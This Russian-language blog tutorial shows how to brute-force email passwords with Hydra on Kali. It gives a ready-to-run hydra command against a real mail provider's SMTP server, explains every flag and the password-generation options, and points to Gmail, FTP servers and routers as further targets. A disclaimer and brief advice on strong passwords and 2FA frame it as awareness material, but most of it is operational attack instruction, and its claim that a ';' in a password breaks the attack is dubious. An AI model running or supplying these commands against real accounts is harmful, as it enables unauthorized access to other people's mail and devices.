Данный материал предназначен исключительно для ознакомления и ни в коем случае не побуждает к действию. Помните, что в некоторых случаях за данное деяние предполагается ответственность. Для обеспечения своей безопасности всегда используйте двухфакторную авторизацию.
Конечно же, никто не станет проделывать данные манипуляции на практике(!), но данная статья покажет Вам, как злоумышленники будут взламывать Ваш email и как этому нужно противостоять.
На деле, взломать незащищенную почту (т.е. методом брутфорса подобрать пароль) относительно просто. Для этого достаточно иметь дистрибутив Kali и любой словарик паролей.
Весь материал сводится к одной команде, но я все объясню.
Сегодня я сделал тестовый ящик с относительно простым паролем, на нем и предлагаю потренироваться. А чтобы было интереснее, я оставил как награду письмо с ссылкой на закрытый чат тестеров моего мода Google Camera :)
Команда имеет вид:
hydra -l example@email.com -P passwords.dic -V -S -s 465 -v smtp://smtp.mail.ru
-l — Использовать указанный логин для попытки аутентификации
-P — Использовать список паролей из указанного файла
-V — Подробный режим. Показывает логин и пароль для каждой попытки
-S — Требовать соединение SSL
-s — Указание порта сервиса
-v — Более подробный вывод информации о процессе
А пока Гидра перебирает пароли, я расскажу о паре других полезных ключей:
-x — Генерировать пароли для подбора самостоятельно, указывается в формате -x MIN:MAX:CHARSET, где MIN - это минимальная длинна пароля, MAX - соответственно, максимальная, а CHARSET - это набор символов, в котором a означает латиницу в нижнем регистре, A - в верхнем регистре, 1 - числа, а дополнительные символы указываются как есть. Вот несколько примеров генерации паролей:
- -x 3:5:a - длина от 3 до 5 символов, состоящие только из символов латиницы в нижнем регистре
- -x 5:8:A1 - длина от 5 до 8 символов, состоящие из символов латиницы в верхнем регистре + цифр
- -x 1:3:/ - длина от 1 до 3 символов, состоящие только из символов слеша (/)
- -x 5:5:/%,.- - длина в 5 символов, состоящие только из символов /%,.-
-u — Пытаться подобрать логин а не пароль
-C — Использовать файл в формате login:pass вместо указания -L/-P
-o — Записать подобранную пару логин/пароль в файл, вместо того чтоб просто вывести в stdout
После окончания подбора ключа в выходных данных Гидры нам предоставляются логин и пароль:
Если кому-то необходимо взломать другой ящик, условный Gmail, то достаточно найти в Google по тегу "smtp gmail":
server: smtp.gmail.com port: 465
Таким же простым методом можно взломать FTP или маршрутизаторы, что дает возможность зайти в настройки роутера и узнать пароль от Wi-Fi.
Поэтому не ленитесь настраивать на своих сервисах/железках защиту от брутфорса.
Пароль, включающий в себя спец. символы и комбинации цифр/букв, как минимум растянет подбор паролей на длительное время. Обратите внимание, что использование символа " ; " в пароле вероятнее всего вовсе "сломает" этот процесс. А использование 2FA с огромной вероятностью защитит Ваш аккаунт от любого взлома, не считая спец. служб или, в редком случае, брутфорса SMS.